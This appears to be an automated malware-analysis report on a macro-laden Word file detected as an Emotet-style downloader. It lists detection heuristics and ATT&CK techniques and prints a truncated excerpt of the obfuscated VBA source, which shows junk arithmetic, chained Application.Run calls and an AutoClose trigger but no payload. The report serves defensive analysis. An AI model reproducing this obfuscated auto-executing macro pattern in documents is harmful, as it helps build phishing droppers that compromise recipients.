MALICIOUS
262
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
This OOXML document contains VBA macros, specifically an Auto_Close macro that utilizes CreateObject to execute a second-stage payload. The presence of VBA macros and the Auto_Close execution trigger strongly suggest a malicious document intended for initial compromise via spearphishing. The specific payload executed by Application.Run is not directly discernible from the provided script excerpts, leading to an 'unknown family' classification.
Heuristics 6
-
ClamAV: Doc.Malware.Emooodldr-6711604-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Emooodldr-6711604-0
-
VBA project inside OOXML medium 3 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
Auto_Close macro high OLE_VBA_AUTOCLOSEAuto_Close macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 13483 bytes |
SHA-256: 852c778f2962e76eb2024b34c24168ce14beb34ee6f35c7fb2270dbc0a5af2fe |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub ddZSINbyLKwgMY()
jrSzDKTG = "OFwYJIXWrfWMrJ" + "FScoCYcSLSOk" + "vpLGVFSiYZ"
bNjBzGZYny = Left("bMpoWMnrQy", 1) + Left("fncPKLxQAX", 7) + "CdCnXpXHJUZKJpB"
HCRxVLyo = LTrim("dGvFSzMKbwFWGWFNYqXUkXBO") + "kxqjCRGuF" + "LpANOKLYgKBwF"
Application.Run "nRKqqScIPcPJCP"
IjcIGTbzHu = Atn(905.95) - 93.34 - 960.61 - 848.22
wRwQBOFw = Atn(853.64) + 441.88 + 732.54 + Atn(441.98) + 790.2 + Atn(496.3) + 778.85
NuSZHuWpk = Atn(155.21) + Atn(986.24) + Atn(626.62) + Atn(546.44)
VgoojDpOn = Atn(229.83) + Atn(408.36) + 725
kCWuRLkVc = RTrim("CD") + "oioIqZDFIMzMOxjVJ" + "OzCwcBZPYSpIFiUp"
End Sub
Sub ydTknTgvZjPYEr()
XkIrzMB = Left("xAAuvOcriq", 6) + Left("LufbpovRKG", 6) + Left("oUGBEIpPuR", 4) + "fRpSXCGjdbOOcn"
ZucuWWIAyYz = RTrim("oxzpvkXjnfDLLdJGiFCcxFH") + "gfkzHHUMiFPywLnV" + "pISCSxQEMkQBqgdjEOuVXoOICggGHC" + LTrim("YnbKzcNiKEVCVDEuUvcLRRApzvkcVM")
UPXvrnyjZQQ = 324.1 - Atn(739.39) - 574.45 - 47.12
Application.Run "PbjBzYLOLMBpkWS"
BQPRdwE = 619.2 - 267.25 - 320.55 - 746.51 - 13.22 - 91.29
jKoOIfyvf = 383.42 - Atn(546.64) - Atn(831.27) - 708.41
gQzjxrYxDfx = 303.37 + Atn(867.65)
oGNGYUj = "IibEjgcpUGKIXNM" + "DNVEWU" + Left("uGOrDOvNSV", 3) + Left("ZkURCkFKwR", 4)
End Sub
Public Function RFDTUEwyjriOCQBKnE(dUndMyuPdHjBEWQv, zTjFCAfvggUFOYOfzJ, qEkgWfkEAEPVITD)
ZpVGjOBnkA = Atn(262.42) - 604.22 - 944.82 - Atn(750.29)
xiHzPZXTY = RTrim("EdJUf") + LTrim("YqccxT")
QxIFcEASMjY = "zEFVBfIS" + "jICHBMEYRoNMSVBrIZGL" + "wuMNqVqZVKf" + "VdMy" + "fSwCrVOpH" + "f"
HTDjyZDq = "NJHFwLrKRwnF" + Left("jnnTCcPKff", 6) + "MVTfOuoDPvoY" + Left("kYPMVByYRW", 4) + Left("vxOVizouui", 9)
rnnOipzXfGJ = 944.49 - 706.68 - Atn(451.95) - Atn(397.13) - Atn(263.6)
jvBHGBEpF = 549.3 + 28.35 + 459.34 + 559.35 + Atn(548.23)
RurboUUz = RTrim("jzRyWkENCbqMKWH") + "IXNuWjRnITU"
MTEqJJkWATR = 734.46 + 800.64 + 190.37 + 627 + Atn(327.37) + 9.83 + 894.21
RFDTUEwyjriOCQBKnE = Replace(dUndMyuPdHjBEWQv, zTjFCAfvggUFOYOfzJ, qEkgWfkEAEPVITD)
njWOzxyWU = 589.87 + Atn(364.13)
UwFJoYziT = 923.4 + 695.65 + Atn(106.51)
SEYgGMSzbZZ = Atn(25.86) - 202.78 - Atn(754.36) - Atn(146.7) - 349.39
AFXrBzU = "HB" + "VVVV" + "Fp"
HqMPUMIbdbT = 455.72 - Atn(376.14) - Atn(310.6) - 978.82
gvyqqpv = "JNI" + "EuPxWgHgcvcPFv" + "XjMpDrLvUVWN" + Left("FIWbjPPXSw", 8)
KLPDoAYPuHy = "d" + LTrim("FHVivBQk") + RTrim("WEMfAKVycJ") + "MFfAGkUWAqiTcoqxHRrdRBJZWY"
yIbroIwObL = "ZpoEziGZHfWfyiU" + LTrim("GMOBVzPQOiNfRjgA") + LTrim("cfzpinQxuZCWSw")
woXoiMXxV = Atn(413.71) + 602.92
QPWzjUoy = "bLiYrdEDyJ" + Left("UiAzVOipbp", 3)
nMIykCiVqLF = "ITLciczkZBcnkOqygYuKRNUvNipo" + "MHL" + "FHuAynIYTjTcZLWHADjgqSvGczTAV" + "zJROMozJvVMRyWGpDZvxO"
INvwXbAViJz = Atn(579.19) + Atn(932.47) + 587.75 + Atn(890.5) + Atn(682.68) + Atn(308.76)
MTNOKVGFKSjC = RTrim("SDTTWckJHpQiMdvbGY") + "Wb" + RTrim("WOzYLjyCYErYCqHDAjqNGGQLfw")
MkGqETkKMfN = LTrim("HIZwCZXCTCckwTGUcrzHDEVPS") + RTrim("OMWdLnuIrMczPfgfTKWL") + LTrim("qwrHCIqHnCUVIPjiBSCwWDVnO")
rzobwTCiE = "ANT" + Left("vRKXuGKEZI", 2) + "HwwWoFoIFNkBMi"
End Function
Sub nRKqqScIPcPJCP()
ZYxVyBXKBKDC = 908.28 - 327.6
xnWEzNCEvrDX = 134.94 - 84.76 - Atn(133.43)
FYVxXIE = Atn(822.94) - 735.52
fnAfNzn = 408.52 + Atn(747.31) + Atn(670.75) + 21.82 + 143.98 + 882.19 + Atn(578.95)
zkkGwKf = Atn(329.1) + 477.2 + 146.8 + Atn(181.37) + 925.23 + 221.33
Application.Run "wzFUOFOLziqcvN"
XHWSqcN = 96.71 + Atn(62.2) + 260.69 + 910.52 + Atn(729.88)
KOIPSPCLVqyR = 580.9 + 530.51 + Atn(463.22) + 597.85
yJwguqzuxj = LTrim("xBPFikHkGOGBbLRJvWWzTWYbALF") + "OgISkDzKWHJgHiJJqrqoE" + LTrim("VnYNrNFxnpfYvfZ") + LTrim("YKJAdRFyDd")
End Sub
Sub AutoClose()
xMQZXqKOQrTc = Atn(664.2) - Atn(589.48)
fTjxYzRV = RTrim("pyikV") + LTrim("pAwdUnLZIRBXFDFWqYuwT") + RTrim("MHZGUvJxNgIACNWwRFZnZBRHMNTI")
yOxPRkuJg = "jNBMcVoxNHrvF
... (truncated)
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: word/vbaProject.bin | 38912 bytes |
SHA-256: 87cb388e257fb42c3d3a2a928e99097c2c1edc20d97a3f8b2d9b2253a48e7889 |
|||
|
Detection
ClamAV:
Doc.Malware.Emooodldr-6711604-0
Obfuscation or payload:
unlikely
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.